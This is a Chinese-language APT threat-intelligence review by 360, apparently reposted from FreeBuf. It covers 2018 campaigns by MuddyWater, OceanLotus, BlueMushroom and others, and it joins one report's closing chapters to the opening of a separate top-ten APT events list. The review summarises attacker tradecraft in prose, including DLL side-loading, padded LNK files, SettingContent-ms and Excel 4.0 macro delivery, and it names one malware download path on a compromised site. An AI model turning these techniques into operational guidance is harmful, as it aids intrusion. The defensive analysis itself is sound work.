2018.7.20 腾讯御见 疑似针对土耳其安全相关部门的攻击[59]。
2018.10.10 Kaspersky 卡巴斯基对该组织的分析,其主要以伊拉克和沙特阿拉伯的政府为目标,也攻击包括中东,欧洲和美国[60]。
2018.11.28 ClearSky 针对黎巴嫩、阿曼的攻击活动[61]。
2018.11.30 Trend Micro 针对土耳其的攻击活动,使用了新的PowerShell  后门[62]。
2018.12.11 Symantec 赛门铁克安全厂商披露Seedworm(即MuddyWater)从2018年9月开始针对30个组织的130个受害者的攻击活动,其中包括中东、欧洲和北美的政府机构、石油天然气、非政府组织、电信和IT企业[63]。

表6  MuddyWater组织在2018年公开披露的主要活动情况 

第三章 针对中国境内的APT组织和威胁

截至目前,360威胁情报中心明确的针对中国境内实施攻击活动的,并且依旧活跃的 公开APT 组织,包括海莲花,摩诃草,蔓灵花,Darkhotel,Group 123,毒云藤和蓝宝菇,其中毒云藤和蓝宝菇是360在2018年下半年公开披露并命名的 APT 组织。下面对其中相对活跃的 APT 组织情况进行回顾。

一、海莲花(APT-C-00)

“海莲花”APT 组织是一个长期针对我国政府、科研院所、海事机构、海域建设、航运企业等领域的 APT 攻击组织,该组织在过去不仅频繁对我国境内实施 APT 攻击,也针对东南亚周边国家实施攻击,包括柬埔寨,越南等。

在2018年中的全球高级持续性威胁报告中,我们总结了该组织使用的攻击战术和技术特点,包括使用开源的代码和公开的攻击工具,如Cobalt Strike。在下半年对该组织的持续跟踪过程,我们还发现海莲花组织针对柬埔寨和菲律宾的新的攻击活动,并且疑似利用了路由器的漏洞实施远程渗透。[18]相关漏洞首次公开是由维基解密披露的CIA Vault7项目资料中提及并由国外安全研究人员发布了相关攻击利用代码。并且还关联到该组织在2017年疑似利用永恒之蓝针对国内高校的攻击测试活动。虽然我们无法完全确定海莲花组织利用了上述公开泄露的网络武器库,但结合相关事件发生的时间线和海莲花组织在过去多次使用公开攻击技术实施攻击活动,我们认为其是极有可能的。

“海莲花”在下半年的攻击活动中使用了更加多样化的载荷投放形式,并使用多种白利用技术加载其恶意模块。

白利用技术 相关模块名称
McAfee mcods.exe文件的白利用 mcvsocfg.dll
Flash.exe的白利用 UxTheme.dll
针对Google的白利用 goopdate.dll
Word白利用 wwlib.dll
360tray.exe的白利用 dbghelp.dll

表7  海莲花组织常用的白利用技术

该组织主要的攻击过程如下:

攻击阶段 使用技术
攻击入口 利用鱼叉邮件投递漏洞文档,如CVE-2017-11882漏洞文档
初始控制 远程下载伪装成图片的PowerShell脚本载荷利用白利用技术执行核心dll载荷
横向移动 主要利用系统命令实现横向移动:使用nbt.exe进行扫描net.exe实现IPC用户添加MsBuild.exe在内网机器上编译生成恶意dll模块并执行

表8  海莲花组织的攻击过程

除此以外,海莲花在攻击目标的选择上也出现一些变化,其也延伸至金融行业,但暂不明确其主要的攻击动机。

二、毒云藤(APT-C-01)

毒云藤(APT-C-01),也被国内其他安全厂商称为穷奇、绿斑。该组织从2007年开始至今,对中国国防、政府、科技、教育以及海事机构等重点单位和部门进行了长达11年的网络间谍活动。该组织主要关注军工、中美关系、两岸关系和海洋相关领域。

该组织主要使用鱼叉攻击投放漏洞文档或二进制可执行文件,如下图所示的鱼叉邮件内容。

image.png

image.png

毒云藤组织主要使用的恶意木马包括Poison Ivy,ZxShell,XRAT等,并使用动态域名,云盘,第三方博客作为其控制回传的基础设施。

三、蓝宝菇(APT-C-12)

蓝宝菇(APT-C-12)组织最早从2011年开始持续至今,对我国政府、军工、科研、金融等重点单位和部门进行了持续的网络间谍活动。该组织主要关注核工业和科研等相关信息。被攻击目标主要集中在中国大陆境内。在2018年中的高级持续性威胁报告中曾对该组织进行了介绍。

蓝宝菇组织也主要使用鱼叉邮件实施攻击,其投放的文件主要是RLO伪装成文档的可执行文件或LNK格式文件。

image.png

该组织主要使用动态域名或IDC IP最为其控制基础设施,后续也常使用AWS S3、新浪云等云服务作为其上传和托管窃取的数据。其常使用的恶意程序包括Poison Ivy、Bfnet,以及PowerShell实现的后门。

蓝宝菇和毒云藤两个组织从攻击来源属于同一地域,但使用的TTP却存在一些差异。

组织名称 毒云藤 蓝宝菇
最早攻击活动时间 2007年 2011年
攻击目标 国防、政府、科技、教育以及海事机构 政府、军工、科研、金融
攻击入口 鱼叉攻击 鱼叉攻击
初始载荷 漏洞文档或二进制可执行文件 RLO伪装成文档的可执行文件或LNK格式文件
恶意代码 Poison  Ivy,ZxShell,XRAT Poison  Ivy、BfnetPowerShell实现的后门
控制回传 动态域名,云盘,第三方博客 动态域名或IDC IPAWS S3、新浪云等云服务

表9  毒云藤和蓝宝菇TTP对比

四、Darkhotel(APT-C-06)

趋势科技在今年7月公开捕获了又一例VBScriptEngine 的在野0day 漏洞(CVE-2018-8373)攻击样本[20]。360威胁情报中心结合内部的威胁情报数据关联到该在野攻击与 Darkhotel 有关[19],该组织在今年多次利用VBScriptEngine的相关0day 漏洞实施在野攻击活动。

image.png

该组织的具体攻击流程如下图。

image.png

第四章 APT威胁的现状和挑战

2018年,APT威胁的攻防双方处于白热化的博弈当中。作为APT防御的安全厂商比往年更加频繁的跟踪和曝光APT组织的攻击活动,其中包括新的APT组织或APT行动,更新的APT攻击武器和在野漏洞的利用。而APT威胁组织也不再局限于其过去固有的攻击模式和武器,APT组织不仅需要达到最终的攻击效果,还刻意避免被防御方根据留下的痕迹和特征追溯到其组织身份。

APT威胁也不再是APT组织与安全厂商之间独有的“猫和老鼠”的游戏,还作为国家与国家之间博弈以及外交舆论层面的手段。例如美国司法部在2018年就多次公开指控了被认为是他国黑客成员对其本土的网络威胁活动,最为详细的就是指控朝鲜黑客PARKJIN HYOK历史涉及的攻击活动[8],而过去影子经纪人曝光的NSA网络武器库资料,维基解密曝光的Vault 7项目以及卡巴斯基披露的Slingshot攻击行动都被认为与美国本土情报机构有关[21]。

一、多样化的攻击投放方式

(一)文档投放的形式多样化

在过去的APT威胁或者网络攻击活动中,利用邮件投递恶意的文档类载荷是非常常见的一种攻击方式,通常投放的文档大多为Office文档类型,如doc、docx,xls,xlsx。

针对特定地区、特定语言或者特定行业的目标人员攻击者可能投放一些其他的文档类型载荷,例如针对韩国人员投放HWP文档,针对巴基斯坦地区投放InPage文档,或者针对工程建筑行业人员投放恶意的AutoCAD文档等等。

(二)利用文件格式的限制

APT攻击者通常会利用一些文件格式和显示上的特性用于迷惑受害用户或安全分析人员。这里以LNK文件为例,LNK文件显示的目标执行路径仅260个字节,多余的字符将被截断,可以直接查看LNK文件执行的命令。

而在跟踪蓝宝菇的攻击活动中,该组织投放的LNK文件在目标路径字符串前面填充了大量的空字符,直接查看无法明确其执行的内容,需要解析LNK文件结构获取。

image.png

(三)利用新的系统文件格式特性

2018年6月,国外安全研究人员公开了利用Windows 10下才被引入的新文件类型“.SettingContent-ms”执行任意命令的攻击技巧,并公开了POC。而该新型攻击方式被公开后就立刻被黑客和APT组织纳入攻击武器库用于针对性攻击,并衍生出各种利用方式:诱导执行、利用Office文档执行、利用PDF文档执行。

2018年8月14日,微软发布了针对该缺陷的系统补丁,对应的漏洞编号为CVE-2018-8414。360威胁情报中心随后发布了利用该攻击技术的相关报告,并发现疑似摩诃草和Darkhydrus组织使用该技术的攻击样本。

(四)利用旧的技术实现攻击

一些被认为陈旧而古老的文档特性可以被实现并用于攻击,360威胁情报中心在下半年就针对利用Excel 4.0宏传播商业远控木马的在野攻击样本进行了分析。

该技术最早是于2018年10月6日由国外安全厂商Outflank的安全研究人员首次公开,并展示了使用Excel 4.0宏执行ShellCode的利用代码。Excel 4.0宏是一个很古老的宏技术,微软在后续使用VBA替换了该特性,但从利用效果和隐蔽性上依然能够达到不错的效果。

从上述总结的多样化的攻击投放方式来看,攻击者似乎在不断尝试发现在邮件或终端侧检测所覆盖的文件类型下的薄弱环节,从而逃避或绕过检测。

二、0day 漏洞和在野利用攻击

0day漏洞一直是作为APT组织实施攻击所依赖的技术制高点,在这里我们回顾下2018年下半年主要的0day漏洞和相关APT组织使用0day漏洞实施的在野利用攻击活动。

所谓0day漏洞的在野利用,一般是攻击活动被捕获时,发现其利用了某些0day漏洞(攻击活动与攻击样本分析本身也是0day漏洞发现的重要方法之一)。而在有能力挖掘和利用0day漏洞的组织中,APT组织首当其冲。

在2018年全球各安全机构发布的APT研究报告中,0day 漏洞的在野利用成为安全圈最为关注的焦点之一。其中,仅2018年下半年,被安全机构披露的,被APT组织利用的0day漏洞就不少于8个。而在2018全年,360的各个安全团队也先后通过在野利用研究,向微软、Adobe等公司报告了5个0day漏洞。

漏洞编号 漏洞类型 披露厂商 相关APT组织
CVE-2018-8453 Windows提权漏洞 卡巴斯基 FruityArmor[29]
CVE-2018-8242 VBS  Engine漏洞 360[30]
CVE-2018-8611 Windows提权漏洞 卡巴斯基[31] FruityArmor、SandCat
CVE-2018-8373 VBS  Engine漏洞 趋势科技[32] Darkhotel
HWP未公开漏洞 360威胁情报中心[12] Group 123
CVE-2018-15982 Flash漏洞 360[28] 未知
CVE-2018-8440 ALPC提权漏洞 ESET[33] PowerPool
韩国相关ActiveX控件漏洞 IssueMakersLab Andariel  Group[34][35]

表10  2018下半年APT组织使用的0day漏洞

360多个安全团队在下半年再一次发现Flash0day漏洞的在野攻击样本并获得Adobe致谢,这是360今年第二次首先捕获到Flash0day漏洞的在野样本并获得致谢。

image.png

三、APT 威胁活动归属面临的挑战

APT威胁活动的归属分析一直是APT威胁分析中最为重要的一个环节,目前APT活动的归属分析,主要的判断依据包括以下几点:

1)APT组织使用的恶意代码特征的相似度,如包含特有的元数据,互斥量,加密算法,签名等等;

2)APT组织历史使用控制基础设施的重叠,本质即pDNS和whois数据的重叠;

3)APT组织使用的攻击TTP;

4)结合攻击留下的线索中的地域和语言特征,或攻击针对的目标和意图,推测其攻击归属的APT组织;

5)公开情报中涉及的归属判断依据。

但APT攻击者会尝试规避和隐藏攻击活动中留下的与其角色相关的线索,或者通过false flag和模仿其他组织的特征来迷惑分析人员。针对韩国平昌奥运会的攻击组织Hades就是一个最好的说明。

360威胁情报中心在下半年的两篇分析报告中,就对活跃在南亚地区的多个APT组织间使用的TTP存在重叠。

组织名称 蔓灵花(BITTER 摩诃草(PatchWork Confucius Bahamut
攻击目标 中国,巴基斯坦 中国,巴基斯坦为主 南亚 南亚(主要巴基斯坦),中东
攻击平台 PC/Android PC/Android PC/Android PC/Android/iOS
恶意代码实现 C Delphi/C# Delphi Delphi/VB
攻击入口 鱼叉攻击 社交网络,鱼叉攻击 社交网络 社交网络,鱼叉攻击

表11  APT组织TTP对比

四、APT检测及防御

随着APT攻击的日益猖獗,现有的APT防御技术也面临着非常大的挑战。传统的APT防护技术专注于从企业客户自身流量和数据中通过沙箱或关联分析等手段发现威胁。而由于企业网络防护系统缺少相关APT学习经验,而且攻击者的逃逸水平也在不断的进步发展,本地设备会经常性的出现误报和漏报现象,经常需要人工的二次分析进行筛选。而且由于APT攻击的复杂性和背景的特殊性,仅依赖于单一企业的数据经常无法有效的发现APT攻击背景,难以做到真正的追踪溯源。360天眼则创新性的从互联网数据进行发掘和分析,由于任何攻击线索都会有相关联的其他信息被互联网数据捕捉到,所以从互联网进行挖掘可极大提升未知威胁和APT攻击的检出效率,而且由于数据的覆盖面更大,可以做到攻击的更精准溯源。

360天眼系统帮助客户发现和处置超过百余起APT攻击事件,包括海莲花事件、摩诃草事件、蔓灵花事件、黄金鼠等APT安全事件,天眼系统服务的客户超过300家,遍及20多个省份和直辖市,在公检法、金融、政府部委、运营商、石油石化、电力、教育、医疗等行业都具有成功案例。

五、APT 威胁的演变趋势

从2018年的APT威胁态势来看,我们推测APT威胁活动的演变趋势可能包括如下:

1)APT组织可能发展成更加明确的组织化特点,例如小组化,各个攻击小组可能针对特定行业实施攻击并达到特定的攻击目的,但其整体可能共享部分攻击代码或资源。

2)APT组织在初期的攻击尝试和获得初步控制权阶段可能更倾向于使用开源或公开的攻击工具或系统工具,对于高价值目标或维持长久性的控制才使用其自身特有的成熟的攻击代码。

3)APT组织针对的目标行业可能进一步延伸到一些传统行业或者和国家基础建设相关的行业和机构,随着这些行业逐渐的互联化和智能化可能带来的安全防御上的弱点,以及其可能面临的供应链攻击。

4)APT组织进一步加强0day漏洞能力的储备,并且可能覆盖多个平台,包括PC,服务器,移动终端,路由器,甚至工控设备等。

总 结

在2018年中的高级持续性威胁报告中,我们以地缘政治下的APT威胁角度对全球高级威胁活动进行了总结,并且对比了部分活跃APT组织所常用的攻击战术技术特点,可以看到APT威胁活动往往和国与国间的政治外交关系存在某些联系。所以在对APT组织的研究和防御过程中,需要更加明确所面临的对手。

在此报告中,我们结合自身对APT组织研究的结果,对APT组织的区分和特点提出了更加明确的定义标准,也对其他研究APT威胁的安全团队表达我们的一些观点,以供安全社区参考。

我们也应该看到,高级威胁活动不完全只是国家背景APT组织的专属,科研机构、大学、医疗机构、工业制造业以及国家基础建设相关的行业和机构都有可能成为APT组织的直接目标,或者是作为其达到整个攻击行动目的中某个攻击阶段的目标。我们需要明确,APT组织是极具有耐心的,其会不断投入资源以达到最初始设定的攻击目的。

附录1 360威胁情报中心

360威胁情报中心由全球最大的互联网安全公司奇虎360特别成立,是中国首个面向企业和机构的互联网威胁情报整合专业机构。该中心以业界领先的安全大数据资源为基础,基于360长期积累的核心安全技术,依托亚太地区顶级的安全人才团队,通过强大的大数据能力,实现全网威胁情报的即时、全面、深入的整合与分析,为企业和机构提供安全管理与防护的网络威胁预警与情报。

360威胁情报中心对外服务平台网址为https://ti.360.net/。服务平台以海量多维度网络空间安全数据为基础,为安全分析人员及各类企业用户提供基础数据的查询,攻击线索拓展,事件背景研判,攻击组织解析,研究报告下载等多种维度的威胁情报数据与威胁情报服务。

image.png

附录2 360追日团队(Helios Team)

360追日团队(Helios Team)是360公司高级威胁研究团队,从事APT攻击发现与追踪、互联网安全事件应急响应、黑客产业链挖掘和研究等工作。团队成立于2014年12月,通过整合360公司海量安全大数据,实现了威胁情报快速关联溯源,独家首次发现并追踪了三十余个APT组织及黑客团伙,大大拓宽了国内关于黑客产业的研究视野,填补了国内APT研究的空白,并为大量企业和政府机构提供安全威胁评估及解决方案输出。

附录3 360高级威胁应对团队

360高级威胁应对团队(360 Advanced Threat Response Team)专注于0day漏洞等高级威胁攻击的应急响应团队,研究领域涵盖高级威胁沙箱检测技术,0day漏洞探针技术以及高级威胁攻击追踪还原等。代表中国安全厂商在全球范围内率先捕获并应急响应了多个在野0day攻击,填补了国内在0day漏洞在野攻击应急响应方面的空白,保护了大量的用户和企事业单位免受高级威胁攻击。

附录 参考链接

1.https://ti.360.net/blog/

2.https://github.com/MISP/misp-galaxy/blob/master/clusters/threat-actor.json

3.https://attack.mitre.org/groups/

4.https://asert.arbornetworks.com/donot-team-leverages-new-modular-malware-framework-south-asia/

5.https://ti.360.net/blog/articles/latest-activity-of-apt-c-35/

6.https://ti.360.net/blog/articles/donot-group-is-targeting-pakistani-businessman-working-in-china/

7.https://www.fireeye.com/blog/threat-research/2018/10/apt38-details-on-new-north-korean-regime-backed-threat-group.html

8.https://www.justice.gov/opa/press-release/file/1092091/download

9.https://ti.360.net/blog/articles/analysis-of-donot-andriod-sample/

10.https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups/

11.https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

12.https://ti.360.net/blog/articles/analysis-of-group123-sample-with-hwp-exploitkit/

13.https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/malicious-document-targets-pyeongchang-olympics/

14.https://securelist.com/olympic-destroyer-is-still-alive/86169/

15.https://research.checkpoint.com/new-strain-of-olympic-destroyer-droppers/

16.https://securelist.com/kaspersky-security-bulletin-2018-top-security-stories/89118/

17.https://blog.trendmicro.com/trendlabs-security-intelligence/campaign-possibly-connected-muddywater-surfaces-middle-east-central-asia/

18.https://ti.360.net/blog/articles/oceanlotus-targets-chinese-university/

19.https://ti.360.net/blog/articles/analyzing-attack-of-cve-2018-8373-and-darkhotel/

20.https://blog.trendmicro.com/trendlabs-security-intelligence/use-after-free-uaf-vulnerability-cve-2018-8373-in-vbscript-engine-affects-internet-explorer-to-run-shellcode/

21.https://www.cyberscoop.com/kaspersky-slingshot-isis-operation-socom-five-eyes/

22.https://www.forcepoint.com/blog/security-labs/autocad-malware-computer-aided-theft

23.https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/

24.https://ti.360.net/blog/articles/details-of-apt-c-12-of-operation-nuclearcrisis/

25.https://blog.yoroi.company/research/new-cozy-bear-campaign-old-habits/

26.https://ti.360.net/blog/articles/analysis-of-settingcontent-ms-file/

27.https://ti.360.net/blog/articles/excel-macro-technology-to-evade-detection/

28.https://ti.360.net/blog/articles/flash-0day-hacking-team-rat-activities-of-exploiting-latest-flash-0day-vulnerability-and-correlation-analysis/

29. https://securelist.com/cve-2018-8453-used-in-targeted-attacks/88151/

30.http://blogs.360.cn/post/from-a-patched-itw-0day-to-remote-code-execution-part-i-from-patch-to-new-0day.html

31.https://securelist.com/zero-day-in-windows-kernel-transaction-manager-cve-2018-8611/89253/

32.https://blog.trendmicro.com/trendlabs-security-intelligence/use-after-free-uaf-vulnerability-cve-2018-8373-in-vbscript-engine-affects-internet-explorer-to-run-shellcode/

33.https://www.welivesecurity.com/2018/09/05/powerpool-malware-exploits-zero-day-vulnerability/

34.http://www.issuemakerslab.com/research3/

35.https://blog.trendmicro.com/trendlabs-security-intelligence/new-andariel-reconnaissance-tactics-hint-at-next-targets/

36.https://ti.360.net/blog/articles/analysis-of-targeted-attacks-suspected-of-patchover/

37.https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html

38.http://blog.alyac.co.kr/1521

39.https://www.fireeye.com/blog/threat-research/2018/02/apt37-overlooked-north-korean-actor.html

40.https://global.ahnlab.com/global/upload/download/techreport/[AhnLab]%20Red_Eyes_Hacking_Group_Report%20(1).pdf

41.https://blog.talosintelligence.com/2018/05/navrat.html

42.https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/

43.http://blog.alyac.co.kr/1985

44.http://blog.alyac.co.kr/2035

45.https://blog.talosintelligence.com/2018/04/fake-av-investigation-unearths-kevdroid.html

46.http://blog.alyac.co.kr/1853

47.https://unit42.paloaltonetworks.com/unit42-reaper-groups-updated-mobile-arsenal/

48.http://blog.k7computing.com/?p=6507

49.https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/malicious-document-targets-pyeongchang-olympics/

50.https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/

51.https://www.securityweek.com/russia-hacked-olympics-computers-turned-blame-north-korea-report

52.https://blog.talosintelligence.com/2018/02/who-wasnt-responsible-for-olympic.html

53.https://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/

54.https://securelist.com/olympic-destroyer-is-still-alive/86169/

55.https://research.checkpoint.com/new-strain-of-olympic-destroyer-droppers/

56.https://blog.trendmicro.com/trendlabs-security-intelligence/campaign-possibly-connected-muddywater-surfaces-middle-east-central-asia/

57.https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html

58.https://blog.trendmicro.com/trendlabs-security-intelligence/another-potential-muddywater-campaign-uses-powershell-based-prb-backdoor/

59.https://mp.weixin.qq.com/s/DggTaSJPiM179Qynzx6KFA

60.https://securelist.com/muddywater/88059/

61.https://www.clearskysec.com/muddywater-operations-in-lebanon-and-oman/

62.https://blog.trendmicro.com/trendlabs-security-intelligence/new-powershell-based-backdoor-found-in-turkey-strikingly-similar-to-muddywater-tools/

63.https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group

64.https://researchcenter.paloaltonetworks.com/2018/11/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/

65.https://securityaffairs.co/wordpress/74843/cyber-warfare-2/apt28-targeted-senator-mccaskill.html

66.https://www.welivesecurity.com/2018/09/27/lojax-first-uefi-rootkit-found-wild-courtesy-sednit-group/

67.https://www.symantec.com/blogs/election-security/apt28-espionage-military-government

68.https://www.welivesecurity.com/2018/11/20/sednit-whats-going-zebrocy/

69.https://www.accenture.com/us-en/blogs/blogs-snakemackerel-delivers-zekapab-malware

70.https://unit42.paloaltonetworks.com/dear-joohn-sofacy-groups-global-campaign/

71.https://www.zdnet.com/article/russian-apt-comes-back-to-life-with-new-us-spear-phishing-campaign/

72.https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html

73.https://blog.yoroi.company/research/new-cozy-bear-campaign-old-habits/

74.http://blogs.360.cn/post/%E6%95%B0%E5%AD%97%E5%8A%A0%E5%AF%86%E8%B4%A7%E5%B8%81%E4%BA%A4%E6%98%93%E8%BD%AF%E4%BB%B6apt%E6%94%BB%E5%87%BB%E7%AE%80%E6%8A%A5-2.html

75.https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/

76.https://www.securonix.com/securonix-threat-research-cosmos-bank-swift-atm-us13-5-million-cyber-attack-detection-using-security-analytics/

77.https://www.us-cert.gov/ncas/alerts/TA18-275A

78.https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-continues-heists-mounts-attacks-on-financial-organizations-in-latin-america/

79.https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/operation-sharpshooter-targets-global-defense-critical-infrastructure/

*本文作者:360天眼实验室,转载请注明来自FreeBuf.COM

前言

APT攻击(Advanced Persistent Threat,高级持续性威胁)是利用先进的攻击手段对特定目标进行长期持续性网络攻击的攻击形式。

360威胁情报中心结合2018年全年国内外各个安全研究机构、安全厂商披露的重大APT攻击事件,以及近几年来披露的高级持续性威胁活动信息,并基于这些重大APT攻击事件的危害程度、攻击频度、攻击技术等,评选出2018年全球十大APT攻击事件。

2018年全球十大APT攻击事件

360威胁情报中心将基于每个APT攻击事件的背景信息、攻击组织、相关TTP(战术、技术、过程)进行描述,带你一起回顾这些重大攻击事件。

韩国平昌冬奥会APT攻击事件

评分:危害程度 ★★★ 攻击频度 ★★ 攻击技术 ★★★

事件时间:韩国平昌奥运会期间,首次活动于2017年12月22日

攻击组织:Hades

受害目标:韩国平昌奥运会举办方

相关攻击武器:Olympic Destroyer

相关漏洞:无

攻击入口:鱼叉邮件攻击

主要攻击战术技术:

1.鱼叉邮件投递内嵌恶意宏的Word文档

2.利用PowerShell实现的图片隐写技术,其使用开源工具Invoke-PSImage实现

3.利用失陷网站用于攻击载荷的分发和控制回传

4.伪装成韩国国家反恐中心(NCTC)的电子邮件地址发送鱼叉邮件,以及注册伪装成韩国农业和林业部的恶意域名

韩国平昌冬奥会APT攻击事件是由McAfee在今年伊始公开披露的APT事件,据相关新闻报道,其导致了奥运会网站的宕机和网络中断。卡巴斯基将该事件背后的攻击组织命名为Hades。

韩国冬奥会攻击事件最为疑惑的是其攻击者的归属问题,并至今仍未有定论。在事件中使用的植入载荷Olympic Destroyer,其用于破坏文件数据的相关代码与过去Lazarus使用的载荷有部分相似,而美国部份媒体则声称该事件为俄罗斯情报机构实施并嫁祸给朝鲜。

该事件再一次展现了APT攻击者利用和模仿其他组织的攻击技术和手法特点,制造false flag以迷惑安全人员并误导其做出错误的攻击来源归属的判断,而似乎制造false flag是Hades组织惯用的攻击手法。

image.png

VPNFilter:针对乌克兰IOT设备的恶意代码攻击事件

评分:危害程度 ★★★★★ 攻击频度 ★★★★ 攻击技术 ★★★★

事件时间:最早从2016年开始,2018年5月首次披露

攻击组织:疑似APT28

受害目标:主要为乌克兰

相关攻击武器:VPNFilter

相关漏洞:针对IOT设备的多种漏洞

攻击入口:利用IOT设备漏洞远程获得初始控制权

主要攻击战术技术:

1.使用多阶段的载荷植入,不同阶段载荷功能模块实现不同

2.使用针对多种型号IOT设备的公开漏洞利用技术和默认访问凭据获得对设备的控制权

3.实现包括:数据包嗅探、窃取网站登录凭据、以及监控Modbus SCADA工控协议

4.针对多种CPU架构编译和执行

5.使用Tor或SSL加密协议进行C2通信

VPNFilter事件是2018年最为严重的针对IOT设备的攻击事件之一,并且实施该事件的攻击者疑似具有国家背景。美国司法部在后续也声称该事件与APT28组织有关。

通过Cisco Talos的披露,该事件影响了至少全球54个国家和地区的50W设备,包括常用的小型路由器型号(例如Linksys,MikroTik,NETGEAR和TP-Link)、NAS设备等。

VPNFilter恶意代码被制作成包含复杂而丰富的功能模块,实现多阶段的攻击利用,并被编译成支持多种CPU架构,使用已知公开的漏洞利用技术获得控制权。

乌克兰特勤局(SBU)后续也公开披露其发现VPNFilter对其国内的氯气蒸馏站的攻击。

image.png

APT28针对欧洲、北美地区的一系列定向攻击事件

评分:危害程度 ★★★★ 攻击频度 ★★★★ 攻击技术 ★★★★★

事件时间:贯穿整个2018年

攻击组织:APT28

受害目标:北美、欧洲、前苏联国家的政府组织

相关攻击武器:Cannon、Zebrocy等

相关漏洞:Office文档模板注入、疑似Lojack软件缺陷或0day漏洞

攻击入口:鱼叉邮件、Office模板注入

主要攻击战术技术:

1.鱼叉邮件发送使用了Office模板注入攻击技术的恶意文档

2.远程注入恶意宏代码并执行

3.释放Delphi版的Cannon和.Net和C#等多个语言版本的Zebrocy木马进行远程控制

4.以及针对LoJack计算机防盗软件植入UEFI rootkit木马程序,实现重装系统及更换硬盘都无法消除的持久化远程控制

APT28组织在整个2018年频繁利用Office模板注入远程宏文档的攻击技术对包括北美国家的外交事务组织、欧洲国家的外交事务组织以及前苏联国家的政府实体进行定向攻击。这些攻击的攻击媒介都是通过鱼叉式网络钓鱼,使用注册到免费电子邮件提供商Seznam的电子邮件帐户,Seznam是一家位于捷克共和国的热门网络服务提供商,并且该攻击大部分文档都包含作者名Joohn。

在2018年9月,ESET还发现APT28组织使用UEFI rootkit针对巴尔干半岛及中欧和东欧的政府组织进行定向攻击的活动。

image.png

蓝宝菇APT组织针对中国的一系列定向攻击事件

评分:危害程度 ★★★★ 攻击频度 ★★★ 攻击技术 ★★★

事件时间:2018年4月(首次攻击时间为2011年)

攻击组织: 蓝宝菇(BlueMushroom)

受害目标:中国政府、军工、科研、金融等重点单位和部门

相关攻击武器:PowerShell后门

相关漏洞:无

攻击入口:鱼叉邮件和水坑攻击

主要攻击战术技术:

1.鱼叉邮件投递内嵌PowerShell脚本的LNK文件,并利用邮件服务器的云附件方式进行投递

2.当受害者被诱导点击恶意LNK文件后,会执行LNK文件所指向的PowerShell命令,进而提取出LNK文件中的其他诱导文件、持久化后门和PowerShell后门脚本。PowerShell后门会通过对受害者的电脑中的特定格式文件进行打包并上传到第三方云空间(如:亚马逊云,新浪云等)

3.从网络上接受新的PowerShell后门代码执行,从而躲避了一些杀软的查杀

“蓝宝菇”APT组织在2018年对我国的政府、军工、科研、金融等重点单位和部门都发起了多次针对性攻击,攻击的技术以及手法也有所升级。从以往的PE木马升级到现在的非PE的脚本后门,以及采用云空间、云附件的手法接收回传的资料信息等都反映了蓝宝菇APT组织在攻击技术方面的更新。从近期360威胁情报中心监控到的攻击事件来看,未来蓝宝菇APT组织都会大量的使用PowerShell脚本等非PE后门来替代原有的PE木马数字武器。

image.png

海莲花APT组织针对我国和东南亚地区的定向攻击事件

评分:危害程度 ★★★★ 攻击频度 ★★★★★ 攻击技术 ★★★

事件时间:2018年全年(首次攻击时间为2012年)

攻击组织:海莲花(OceanLotus)

受害目标:东南亚国家、中国及其相关科研院所、海事机构、航运企业等

相关攻击武器:Denis家族木马、Cobalt Strike、CACTUSTORCH框架木马

相关漏洞:微软Office漏洞、MikroTik路由器漏洞、永恒之蓝漏洞

攻击入口:鱼叉邮件和水坑攻击

主要攻击战术技术:

1.鱼叉邮件投递内嵌恶意宏的Word文件、HTA文件、快捷方式文件、SFX自解压文件、捆绑后的文档图标的可执行文件等

2.入侵成功后通过一些内网渗透工具扫描渗透内网并横向移动,入侵重要服务器,植入Denis家族木马进行持久化控制

3.通过横向移动和渗透拿到域控或者重要的服务器权限,通过对这些重要机器的控制来设置水坑、利用第三方工具并辅助渗透

4.横向移动过程中还会使用一些逃避杀软检测的技术:包括白利用技术、PowerShell混淆技术等

“海莲花”APT 组织在2018年全年频繁的针对我国及东南亚国家进行持续的针对性攻击,比如针对柬埔寨和菲律宾的新的攻击活动,并且疑似利用了路由器的漏洞实施远程渗透。相关漏洞首次公开是由维基解密披露的CIA Vault7项目资料中提及并由国外安全研究人员发布了相关攻击利用代码。并且“海莲花”在2018年的攻击活动中使用了更加多样化的载荷投放形式,并使用多种白利用技术加载其恶意模块。

蔓灵花APT组织针对中国、巴基斯坦的一系列定向攻击事件

评分:危害程度 ★★★ 攻击频度 ★★★★ 攻击技术 ★★★

事件时间:2018年初

攻击组织: 蔓灵花(BITTER)

受害目标:中国、巴基斯坦

相关攻击武器:“蔓灵花”特有的后门程序

相关漏洞:InPage文字处理软件漏洞CVE-2017-12824、微软公式编辑器漏洞等

攻击入口:鱼叉邮件攻击

主要攻击战术技术:

1.鱼叉邮件投递内嵌Inpage漏洞利用文档、微软公式编辑器漏洞利用文档、伪造成文档/图片的可执行文件等

2.触发漏洞后释放/下载执行恶意木马,与C2保持通信,并根据C2返回的命令下载指定插件执行

3.下载执行多种远控插件进行远程控制

“蔓灵花”APT组织在2018年利用InPage文档处理软件漏洞、微软公式编辑器漏洞、伪造文档图标的可执行文件等攻击手法,针对中国、巴基斯坦重要组织机构和人员多次发起定向攻击。多次攻击活动表明,蔓灵花习惯攻陷巴基斯坦政府网站用于下发后续木马,比如在11月针对巴基斯坦的攻击活动中,后续木马下发地址为:fst.gov.pk/images/winsvc,而fst.gov.pk则是巴基斯坦政府的相关网站。

